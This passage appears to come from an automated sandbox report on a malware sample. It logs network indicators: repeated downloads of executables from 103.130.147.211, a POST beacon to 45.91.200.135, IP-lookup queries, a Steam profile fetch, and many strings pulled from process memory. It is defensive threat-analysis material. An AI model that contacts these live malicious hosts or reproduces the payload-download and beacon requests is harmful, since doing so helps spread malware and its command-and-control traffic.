            Source: global trafficHTTP traffic detected: HEAD /Files/tac.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /Files/CheckTool.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /Files/Channel2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /Files/tac.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 45.91.200.135
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: unknownTCP traffic detected without corresponding DNS query: 103.130.147.211
            Source: global trafficHTTP traffic detected: GET /1S3fd7 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplog.co
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: GET /api/wp-ping.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.91.200.135
            Source: global trafficHTTP traffic detected: GET /Files/CheckTool.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /Files/Channel2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /Files/tac.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 103.130.147.211Cache-Control: no-cache
            Source: wab.exe, 00000004.00000003.1454833562.0000000003546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "30" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/twitter-light.c8dff709.svg"/></a></li><li><a href="https://www.youtube.com/@ipinfo-io" target="_blank" rel="noopener noreferrer"><img alt="YouTube" loading= equals www.youtube.com (Youtube)
            Source: wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "lazy" width="30" height="30" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/youtube-light.cf5a6d38.svg"/></a></li><li><a href="https://www.facebook.com/ipinfo.io" target="_blank" rel="noopener noreferrer"><img alt="Facebook" loading="lazy" width="30" height="30" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/facebook-light.0be4f2a5.svg"/></a></li></ul></div><ul class="flex flex-row gap-x-4"><li><a href="https://www.capterra.com/reviews/227725/IPinfo?utm_source=vendor&amp;utm_medium=badge&amp;utm_campaign=capterra_reviews_badge" target="_blank" rel="noopener noreferrer"><img alt="Capterra Reviews" border="0" loading="lazy" width="150" height="49" decoding="async" data-nimg="1" style="color:transparent" src="https://assets.capterra.com/badge/7cd654c7533ce5d2d550ac86472a835b.svg"/></a></li><li><a href="https://www.g2.com/products/ipinfo-io/reviews?utm_source=review-widget" target="_blank" rel="noopener noreferrer"><img alt="Read IPinfo.io Reviews on G2" border="0 equals www.facebook.com (Facebook)
            Source: wab.exe, 00000004.00000003.1454793864.0000000003551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "lazy" width="30" height="30" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/youtube-light.cf5a6d38.svg"/></a></li><li><a href="https://www.facebook.com/ipinfo.io" target="_blank" rel="noopener noreferrer"><img alt="Facebook" loading="lazy" width="30" height="30" decoding="async" data-nimg="1" style="color:transparent" src="https://website-cdn.ipinfo.io/_next/static/media/facebook-light.0be4f2a5.svg"/></a></li></ul></div><ul class="flex flex-row gap-x-4"><li><a href="https://www.capterra.com/reviews/227725/IPinfo?utm_source=vendor&amp;utm_medium=badge&amp;utm_campaign=capterra_reviews_badge" target="_blank" rel="noopener noreferrer"><img alt="Capterra Reviews" border="0" loading="lazy" width="150" height="49" decoding="async" data-nimg="1" style="color:transparent" src="https://assets.capterra.com/badge/7cd654c7533ce5d2d550ac86472a835b.svg"/></a></li><li><a href="https://www.g2.com/products/ipinfo-io/reviews?utm_source=review-widget" target="_blank" rel="noopener noreferrer"><img alt="Read IPinfo.io Reviews on G2" border="0i equals www.facebook.com (Facebook)
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketc equals www.youtube.com (Youtube)
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tps://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'i equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: api64.ipify.org
            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
            Source: global trafficDNS traffic detected: DNS query: db-ip.com
            Source: global trafficDNS traffic detected: DNS query: api.myip.com
            Source: global trafficDNS traffic detected: DNS query: 58yongzhe.com
            Source: unknownHTTP traffic detected: POST /api/wp-admin.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 45.91.200.135
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1971130761.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1803265464.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.css
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000002.1971130761.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmp, RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1803265464.0000000002DC6000.00000008.00000001.01000000.0000000A.sdmpString found in binary or memory: http://.jpg
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCef
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1916230697.000001E7D2017000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1923291891.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925997584.000001E7D201E000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1925375209.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000002.2687605749.000001E7D201B000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 00000014.00000003.1916763036.000001E7D2048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
            Source: BitLockerToGo.exe, 00000013.00000003.1979512953.000000000362D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m_
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BF4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
            Source: file.exe, 00000000.00000002.1511871135.000001DC9BF4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A4089C1000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807179594.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806090341.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1902278313.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1900520747.000001A40899D000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806646627.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805784517.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806794188.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805342441.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806463369.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1807441735.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806311951.000001A408990000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000002.2680451847.000001A40897C000.00000004.00000020.00020000.00000000.sdmp, z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1805552987.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: z2_3yhxvvYYX1CmTdADYCHAQ.exe, 0000000D.00000003.1806904205.000001A408990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4
